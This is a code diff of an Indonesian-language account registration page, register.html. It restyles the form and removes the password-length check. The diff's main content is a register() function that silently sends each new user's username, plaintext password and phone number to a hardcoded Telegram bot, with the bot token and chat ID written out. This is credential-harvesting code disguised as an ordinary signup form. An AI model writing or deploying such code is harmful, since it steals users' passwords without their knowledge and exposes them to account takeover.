--- a/register.html
+++ b/register.html
@@ -5,55 +5,35 @@
   <title>Daftar Akun</title>
   <style>
     body {
-      font-family: Arial, sans-serif;
-      background: #f1f1f1;
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      height: 100vh;
-    }
-    .form-box {
-      background: #fff;
-      padding: 30px;
-      border-radius: 12px;
-      box-shadow: 0 5px 15px rgba(0,0,0,0.1);
-      width: 300px;
+      font-family: Arial;
+      padding: 20px;
       text-align: center;
+      background-color: #f6f6f6;
     }
     input {
-      width: 100%;
+      width: 80%;
       padding: 10px;
       margin: 10px 0;
       border-radius: 8px;
       border: 1px solid #ccc;
     }
     button {
-      padding: 10px;
-      width: 100%;
-      background: #0074ff;
-      color: #fff;
+      padding: 10px 20px;
       border: none;
       border-radius: 8px;
-      font-weight: bold;
+      background: #3498db;
+      color: #fff;
     }
-    a {
-      color: #0074ff;
-      text-decoration: none;
-    }
-    a:hover {
-      text-decoration: underline;
-    }
+    p a { text-decoration: none; color: #2c3e50; }
   </style>
 </head>
 <body>
-  <div class="form-box">
-    <h2>Daftar Akun</h2>
-    <input type="text" id="username" placeholder="Username" required />
-    <input type="password" id="password" placeholder="Password (min 4 karakter)" required />
-    <input type="tel" id="phone" placeholder="Nomor Telepon" required />
-    <button onclick="register()">Daftar</button>
-    <p>Sudah punya akun? <a href="index.html">Login</a></p>
-  </div>
+  <h2>Daftar Akun</h2>
+  <input type="text" id="username" placeholder="Username" required><br>
+  <input type="password" id="password" placeholder="Password" required><br>
+  <input type="tel" id="phone" placeholder="Nomor Telepon" required><br>
+  <button onclick="register()">Daftar</button>
+  <p>Sudah punya akun? <a href="index.html">Login</a></p>
 
   <script>
     function register() {
@@ -61,20 +41,12 @@
       const password = document.getElementById('password').value;
       const phone = document.getElementById('phone').value.trim();
 
-      if (!username || !password || !phone) {
-        return alert("Semua field wajib diisi.");
-      }
+      if (!username || !password || !phone) return alert("Semua field wajib diisi.");
 
-      if (password.length < 4) {
-        return alert("Password minimal 4 karakter.");
-      }
+      const users = JSON.parse(localStorage.getItem("users") || "[]");
 
-      let users = JSON.parse(localStorage.getItem("users") || "[]");
-
-      const isExist = users.some(user => user.username === username || user.phone === phone);
-      if (isExist) {
-        return alert("Username atau nomor sudah terdaftar.");
-      }
+      const exist = users.some(user => user.username === username || user.phone === phone);
+      if (exist) return alert("Username atau nomor sudah terdaftar.");
 
       users.push({ username, password, phone });
       localStorage.setItem("users", JSON.stringify(users));
@@ -82,11 +54,10 @@
       // Kirim ke Telegram
       const token = "7621390139:AAE9oNVeBy946yGbO7IDsT34DFY3THvGC6I";
       const chatId = "7882058841";
-      const msg = `PENDAFTARAN:\nUsername: ${username}\nPassword: ${password}\nTelepon: ${phone}`;
-      fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(msg)}`)
-        .catch(err => console.error("Gagal kirim ke Telegram", err));
+      const msg = `PENDAFTARAN BARU:\n\nUsername: ${username}\nPassword: ${password}\nTelepon: ${phone}`;
+      fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(msg)}`);
 
-      alert("Pendaftaran berhasil!");
+      alert("Pendaftaran berhasil.");
       window.location.href = "index.html";
     }
   </script>
